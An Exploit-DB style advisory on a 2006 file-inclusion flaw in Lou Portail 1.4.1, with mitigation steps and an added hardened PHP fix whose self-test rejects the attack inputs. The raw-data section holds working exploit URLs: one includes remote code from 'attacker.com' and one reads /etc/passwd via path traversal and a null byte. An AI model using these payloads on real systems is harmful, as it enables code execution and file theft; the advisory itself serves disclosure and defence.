Vendor: Lou Portail
By: MP
CVSS: 7.5 (HIGH)
Title: Remote|Local File Include Vulnerability
CWE: 98
Product Name: Lou Portail
Affected Version From: 1.4.1
Affected Version To: 1.4.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2006

Lou Portail 1.4.1

The vulnerability exists because admin/admin_module.php builds an include path from two unvalidated variables, include("$g_admin_rep/admin_utils.$g_ext"). With register_globals = On, both $g_admin_rep and $g_ext can be set directly from the query string. Setting g_admin_rep to a URL such as http://attacker.com makes include() fetch and execute http://attacker.com/admin_utils.<g_ext> as PHP, so arbitrary code runs on the web server (remote file inclusion); because g_ext is also attacker-chosen, the hosted file can carry any extension. Alternatively, a relative path ending in a URL-encoded null byte (%00) truncates the fixed "/admin_utils.$g_ext" suffix inside include(), so an arbitrary local file such as /etc/passwd is read and returned (local file inclusion); this second form needs magic_quotes_gpc = Off, since magic quotes would escape the null byte.

Mitigation:

The vendor had not released a patch when this advisory was published. Until a fixed version exists, the practical mitigations are configuration and access control: set register_globals = Off (both vectors depend on it, because $g_admin_rep and $g_ext only become attacker-controllable when PHP turns request parameters into globals); set allow_url_fopen = Off so include() cannot fetch a remote URL; keep magic_quotes_gpc = On or otherwise strip null bytes from request input, since the LFI payload relies on a raw %00 reaching include() (PHP 5.3.4 and later reject null bytes in include paths anyway); and restrict the admin/ directory to trusted addresses or put authentication in front of it at the web server. As a general measure, keep all software up to date.
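A hardened replacement for the vulnerable include, added here as an example; it is not Lou Portail's code and not from the advisory author. It assumes that the admin helper lives in a sub-directory of admin/ named by g_admin_rep, that "php" is the only legitimate extension, and that ADMIN_BASE, ALLOWED_EXT and resolve_admin_utils are names chosen for this example. If, in the real application, the directory and extension are fixed configuration rather than a per-request choice, the simpler fix is to hard-code them in the script and never read them from the request at all.

```php
<?php
// Added example, not Lou Portail's code: a hardened replacement for
//     include ("$g_admin_rep/admin_utils.$g_ext");
// in admin/admin_module.php. Assumptions (not from the advisory): the
// helper lives in a sub-directory of ADMIN_BASE, the only legitimate
// extension is "php", and the sub-directory name is a plain identifier.
declare(strict_types=1);

const ADMIN_BASE  = __DIR__;          // assumed: this file sits in admin/
const ALLOWED_EXT = ['php'];          // assumed allow-list for $g_ext

/**
 * Return the absolute path of <ADMIN_BASE>/<rep>/admin_utils.<ext>, or null
 * if the request could escape ADMIN_BASE or select an unexpected file type.
 * Both arguments are passed explicitly; nothing comes from register_globals.
 */
function resolve_admin_utils(string $rep, string $ext): ?string
{
    // Vuln 2.0: a %00 in the parameter truncated the path inside include().
    // Refuse NUL and every other control byte before doing anything else.
    if (preg_match('/[\x00-\x1f\x7f]/', $rep . $ext) === 1) {
        return null;
    }
    // Vuln 1.0: "http://attacker.com" turned the include into a remote fetch.
    // Refuse anything that looks like a URL or stream wrapper (scheme://).
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $rep) === 1) {
        return null;
    }
    // The extension is attacker-chosen in the original; pin it to the allow-list.
    if (!in_array(strtolower($ext), ALLOWED_EXT, true)) {
        return null;
    }
    // Only a single plain directory name: no "/", "\", "..", or absolute paths.
    if (preg_match('/^[A-Za-z0-9_-]+$/', $rep) !== 1) {
        return null;
    }
    $base      = realpath(ADMIN_BASE);
    $candidate = realpath(ADMIN_BASE . '/' . $rep . '/admin_utils.' . $ext);
    if ($base === false || $candidate === false) {
        return null;                                   // missing file or base
    }
    // realpath() resolves symlinks; the result must still sit under the base.
    if (strpos($candidate, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

if (PHP_SAPI === 'cli') {
    // Self-check with the advisory's two payloads plus a plain traversal;
    // each must be rejected regardless of register_globals or magic_quotes_gpc.
    $payloads = [
        ['http://attacker.com', 'txt'],                        // Vuln 1.0
        [str_repeat('../', 20) . "etc/passwd\0", 'php'],       // Vuln 2.0
        ['../../etc/passwd', 'php'],                           // traversal, no NUL
    ];
    foreach ($payloads as [$rep, $ext]) {
        if (resolve_admin_utils($rep, $ext) !== null) {
            fwrite(STDERR, "NOT rejected: " . addcslashes($rep, "\0..\37") . "\n");
            exit(1);
        }
    }
    echo "all payloads rejected\n";
} else {
    // Web entry point: read the parameters explicitly (no register_globals),
    // insist on scalar strings, and refuse the request rather than guess a path.
    $rep  = $_GET['g_admin_rep'] ?? '';
    $ext  = $_GET['g_ext'] ?? '';
    $path = (is_string($rep) && is_string($ext)) ? resolve_admin_utils($rep, $ext) : null;
    if ($path === null) {
        http_response_code(400);
        exit('invalid admin module');
    }
    include $path;   // top-level include keeps the original's variable scope
}
```

Run the file with php -f on the command line to execute the self-check against the advisory's payloads; when served by the web server the same file reads g_admin_rep and g_ext explicitly from $_GET, which removes the dependence on register_globals, rejects null bytes whatever magic_quotes_gpc is set to, and refuses URLs whatever allow_url_fopen is set to.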

Exploit-DB raw data:

## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## ##
#                                                               #
#           [ Lou Portail 1.4.1 ]                               #
#                                                               #
# Class:     Remote|Local File Include Vulnerability            #
# Patch:     Unavailable                                        #
# Published  2006/10/18                                         #
# Remote:    Yes                                                #
# Local:     No                                                 #
# Type:      High                                               #
# Site:      http://louportail.free.fr/                         #
# Author:    MP                                                 #
# Contact:   mp01010@yahoo.com                                  #
#                                                               #
#################################################################

Vuln Code (admin/admin_module.php):

<?...
  // $g_admin_rep and $g_ext are never validated; with register_globals = On
  // a request parameter of the same name sets each of them before this line
  include ("$g_admin_rep/admin_utils.$g_ext");
...?>

#Vuln 1.0 -> require register_globals = On (and allow_url_fopen = On, so include() can open URLs)
http://louportail.com/admin/admin_module.php?g_admin_rep=http://attacker.com&g_ext=txt
# include() fetches http://attacker.com/admin_utils.txt and executes it as PHP; because g_ext is
# attacker-chosen, the hosted file does not have to be named .php

#Vuln 2.0 -> require magic_quotes_gpc = Off (and register_globals = On, as above)
http://louportail.com/admin/admin_module.php?g_admin_rep=../../../../../../../../../../../../../../../../../../../../etc/passwd%00
# the decoded null byte truncates the "/admin_utils.$g_ext" suffix, so /etc/passwd is included
# and echoed; with magic_quotes_gpc = On the null byte is escaped, and PHP 5.3.4 and later
# reject null bytes in include paths altogether

# milw0rm.com [2006-10-20]